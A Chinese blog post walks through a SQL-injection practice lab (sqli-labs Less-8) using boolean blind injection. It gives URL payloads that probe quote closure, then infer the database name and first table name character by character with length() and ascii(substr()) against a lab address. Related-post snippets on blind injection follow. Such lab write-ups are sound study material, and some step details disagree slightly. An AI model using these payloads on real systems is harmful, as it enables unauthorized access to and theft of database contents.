SQL 布尔盲注 (injection 第八关)

已于 2024-08-15 17:30:50 修改
阅读量273 收藏 4
点赞数 7
文章标签: sql 数据库 网络 安全 爬虫
于 2024-08-15 17:27:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/baishiqi12/article/details/141224532
版权

简介

   SQL注入(SQL Injection)是一种常见的网络攻击方式,通过向SQL查询中插入恶意的SQL代码,攻击者可以操控数据库,SQL注入是一种代码注入攻击,其中攻击者将恶意的SQL代码插入到应用程序的输入字段中,然后这些输入被传递到数据库服务器上执行。攻击者可以利用这一漏洞执行任意的SQL查询或命令,从而访问或操控数据库中的敏感信息。

       SQL注入的一个简要流程:


1、打开目标靶场

 2、选择less - 8

3、确定网站可以注入的参数

http://172.16.1.13/Less-8/?id= 

4、判断闭合方式   

 http://172.16.1.13/Less-1/?id=1' --+

5、确定数据库长度length()函数

因为页面只有ture和flase两种情况,所以需要使用布尔盲注判断数据库长度,使用length()函数

例如: http://172.16.1.13/Less-8/?id=1' and length(database())>6--+

 http://172.16.1.13/Less-8/?id=1' and length(database())>8--+

最终可以确定数据库名长度为8

6、确定数据库字符使用ASCII码

文章结尾附有ASCII码表 

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于114 页面显示正常 说明数据库第一位字符ascii码大于114

http://172.16.1.13/Less-8/?id=1' and ascii(substr(database(),1,1))>120--+

最终可以确定第一位字符ascii码为115,确定为字母s

以此类推,最终可确定数据库名为 security

7、查询数据库中第一张表

查询第一张表的第一个字符

http://172.16.1.13/Less-8/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100--+

最终可以确定第一位字符ascii码为101,确定为字母e

按照此法依次可以得出最终自己想要的数据内容!!!

ASCII码表如下

安全 

网络安全为人民,网络安全考人民。

白十七12
关注
  • 7
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqlserver数据库布尔盲注_sql注入入门之mysql布尔盲注
weixin_34393451的博客
12-24 431
1,实例 mysql 盲注点,如下,虽然这并不是个标标准准的盲注点,但并不影响我们用盲注的方式来获取数据,以后遇到纯正的盲注点,我们再补充:2,一阵单引号过后,目标数据库如期报错,对于mysql来讲,一般出现这情况,百分之九十九可以确定这就是个正儿八经的注入点3,尝试闭合,还是前面的问题,不要一眼看到数字就认定它是个数字型注入,比如该实例就又是个字符型注入,我们只需闭合前面的单引号注释掉后面的语句...
CTFHUB——SQL布尔盲注自动化脚本的实现
wuuconix's blog
08-27 1669
背景 很久以前做过布尔盲注的题目,但是当时用的是网上的代码,跑出来flag了也是一知半解,没有收获。 今天花了一下午的时间写了一个布尔盲注的脚本。 介绍 布尔盲注使用场景的特征十分明显,即界面不会给出查询的具体结果,也不会给你报错信息。而只会告诉你查询成功还是查询失败。 这就需要我们去利用一些神奇的函数比如substr,ascii,length来猜测。 猜测什么呢?首先猜测数据库的长度,知道了长度,就去猜数据库每个字符。知道了数据库,就去猜数据表的个数,表名长度,具体表名等等等等。也就是所有的一切都是你需要
渗透测试-SQL注入之布尔盲注和时间盲注
lza20001103的博客
04-20 2867
渗透测试-SQL注入之布尔盲注和时间盲注
DVWA--sql注入(布尔盲注)
firecjh的博客
06-09 172
使用参数1' and 1=1 #进行提交,页面显示存在。使用参数1' and 1=2 #进行提交,页面显示不存在。判断出是基于字符型的布尔注入。1)、判断是否存在注入,注入是字符型还是数字型。7)猜解数据库表中的列的数量。8)猜解数据库表中列名称的长度。9)猜解数据库表中的列的名称。5)猜解数据库表名的长度。4)猜解数据库表的数量。6)猜解数据库表的名称。10)猜测用户名和密码。猜解数据库名的长度。
SQL注入之基于布尔盲注详解
09-10
在基于布尔盲注中,攻击者通常会尝试构造一系列的SQL查询,这些查询会在满足特定条件时改变原本的查询结果,从而导致网页返回不同的状态。例如,通过在URL中添加`id=2' and length(database())>1 %23`这样的参数,...
超级SQL注入工具,支持布尔盲注,报错盲注,union注入等
03-27
超级SQL注入工具目前支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库。 超级SQL注入工具采用C#开发,底层采用Socket发包进行HTTP交互,极大的提升了发包效率,...
python编写的sql盲注
10-28
python编写的sql盲注
网络安全原理与应用:SQL盲注.pptx
05-16
布尔盲注依赖于查询结果导致的不同输出响应。例如,如果注入的条件为真,服务器可能会返回不同的错误信息或响应时间。在这个过程中,攻击者通过一系列的试探性查询,比如"数据库名的第一个字母是a吗?",逐步确定...
sql盲注检测的简单脚本.zip
03-10
SQL盲注SQL Blind Injection)是一种常见的网络安全漏洞,它发生在Web应用程序中,攻击者通过提交特定的SQL查询到输入字段,然后根据系统响应或不响应来推断数据库的信息。这个"sql盲注检测的简单脚本.zip"压缩包...
Sql与Rce注入相漏洞复现
山月不问人间事
08-12 725
‌这些查询可以是SELECT、‌INSERT、‌UPDATE或DELETE等,‌它们将在数据库中按顺序处理,‌尽管它们是在单个函数调用中发送的。假设我发送的是这样一个请求:i_d=1&i.d=2 ,php先将i.d转换成i_d,即为i_d=1&i_d=2 ,再获取到的$_REQUEST['i_d']就是2。可在$_SERVER['REQUEST_URI']中,i_d和i.d却是两个完全不同的参数名,那么切割覆盖后,获取的$_REQUEST['i_d']却是1。参数是可选的,‌用于限制分割后的数组元素数量。
Prostgresql的Timescaledb插件/扩展部署
weixin_45697805的博客
08-14 139
背景:研发需求,需要把docker部署得postgresql迁移到新的节点并要求再本地部署,提前查看数据库需要那些插件,并进行安装,docker部署的默认有插件。
kubernetes集群部署sql server数据库服务
jiang0615csdn的博客
08-08 504
kubernetes集群部署sql server数据库服务
SQL Server 事务
a876106354的博客
08-09 546
SQL Server 事务是数据库操作的一个基本特性,它允许你将一系列数据库操作组合成一个原子单元,这个单元中的所有操作要么全部成功,要么全部失败。事务具有以下四个重要的属性,通常被称为ACID属性。
oracle使用sql生成表结构文档
最新发布
yannsann的博客
08-14 490
客户要求数据资产盘点,需要提供相表字段的说明文档,指定具体格式。手动是不可能手动的,使用SQL实现。
SQL 索引、约束、外键 —/—<11>
qq_64603703的博客
08-14 724
索引名称应该是一个有效的标识符,并且在表中的索引名称必须是唯一的。其中,index_name是要创建的索引的名称,table_name是要在其中创建索引的表的名称,column1, column2,...是要在索引中包含的列的名称。其中,table_name是要修改的表的名称,index_name是要添加的索引的名称,column1, column2,...是要在索引中包含的列的名称。MySQL索引的建立对于MySQL的高效运行是很重要的,索引可以大大提高MySQL的检索速度。
达梦数据库(十) -------- mybatis-plus 整合达梦时,自动生成的 sql 语句报错
weixin_52466601的博客
08-09 514
问题原因:mybatis-plus 生成的 sql 语句字段是小写的,同时还包含数据库键字。框架会默认加上(`)符号,该符号在达梦数据库中无法被识别,需要更换为 (")。方案二:修改实体类的字段名称避免使用达梦数据库键字。
使用现有的 bitnami/postgresql:16.3.0 镜像安装pg_roaringbitmap插件
美味小鱼的杂货铺
08-14 194
你应该能看到 roaringbitmap 在已安装的扩展列表中。
sql常用语法总结
零度°C的博客
08-06 1767
除了基本的内连接(INNER JOIN),还有左连接(LEFT JOIN)、右连接(RIGHT JOIN)和全外连接(FULL OUTER JOIN)。- 允许声明临时的结果集,可以被一个或多个SELECT、INSERT、UPDATE或DELETE语句引用。- 自动执行的SQL语句,通常在INSERT、UPDATE或DELETE操作发生时触发。- 保证一系列操作要么全部成功,要么全部失败,且对数据库的修改是原子性的。- 事务是一组操作,要么全部成功,要么全部失败。- 子查询是嵌套在另一个查询中的查询。
墨者靶场sql布尔盲注
10-09
针对墨者靶场的 SQL 布尔盲注,你需要先了解 SQL 注入的基本概念和实现方式。在进行布尔盲注时,需要通过构造特定的 SQL 语句来判断数据库中是否存在某些数据或条件,从而实现注入攻击。以下是一些可能用到的注入语句: 1. 判断存在性:SELECT * FROM table WHERE column = 'value' and 1=1(存在)或 1=2(不存在) 2. 判断字段长度:SELECT * FROM table WHERE LENGTH(column) = n and 1=1(长度为 n)或 1=2(长度不为 n) 3. 判断字符内容:SELECT * FROM table WHERE ASCII(SUBSTRING(column, n, 1)) = c and 1=1(第 n 个字符的 ASCII 码为 c)或 1=2(第 n 个字符的 ASCII 码不为 c) 在使用布尔盲注时,需要不断地尝试不同的语句,并根据返回结果进行判断和推断。同时,需要注意防止误伤和误判,以免造成不必要的影响和损失。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值